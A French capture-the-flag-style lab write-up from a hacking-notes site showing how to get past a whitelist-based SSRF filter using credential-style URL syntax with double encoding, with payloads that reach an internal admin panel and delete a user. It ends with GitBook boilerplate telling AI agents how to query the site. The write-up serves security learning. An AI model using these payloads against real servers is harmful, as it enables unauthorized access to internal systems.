> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/ssrf/ssrf-with-whitelist-based-filter.md).

# SSRF avec filtrage basé sur une liste blanche

### SSRF avec filtre d'entrée basé sur une liste blanche

La fonctionnalité de vérification du stock envoie des requêtes à un système interne. / L'objectif est de modifier l'URL utilisée dans le `stockApi` paramètre pour atteindre l'interface d'administration située à `HTTP://localhost/admin`, puis supprimer l'utilisateur **carlos**. / Le développeur a mis en place une défense anti-SSRF basée sur une **liste blanche d'hôtes autorisés**, qui doit être contournée.

```javascript
stockApi=http://stock.weliketoshop.net:8080/product/stock/check?productId=1%26storeId=1
```

#### **Analyse du filtre**

L'application n'autorise les requêtes que vers l'hôte suivant :

```bash
stockApi=http://127.0.0.1/admin
```

<figure><img src="/files/7f91e95fffcaf07e730186e0f8746b783f0dffba" alt=""><figcaption></figcaption></figure>

Si nous modifions l'URL en `localhost` ou une adresse interne, nous obtenons l'erreur :

L'hôte externe de vérification du stock doit être stock.weliketoshop.net

#### **Contournement de la liste blanche**

L'idée est d'utiliser la `username:password@host` syntaxe dans les URL. / Cette méthode nous permet de **forcer l'hôte validé par la liste blanche à apparaître dans la partie « authority »** alors qu'en réalité la requête est dirigée vers `localhost`.

```bash
http://username:password@website.com
```

Charge utile utilisée :

```bash
stockApi=http://localhost:80%252f@stock.weliketoshop.net:8080
```

Avec `/` (`%252f`) un double encodage, le serveur interprète correctement la partie redirigée vers `localhost`.

Cela permet d'accéder au panneau d'administration interne.

<figure><img src="/files/2bbc369613ea127e735d516f05460fdee0d5b98d" alt=""><figcaption></figcaption></figure>

#### **Suppression de l'utilisateur Carlos**

Une fois le contournement fonctionnel, l'URL de suppression est appelée directement :

{% code overflow="wrap" %}

```bash
stockApi=http://localhost:80%252f@stock.weliketoshop.net:8080/admin?delete=username=carlos
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/ssrf/ssrf-with-whitelist-based-filter.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
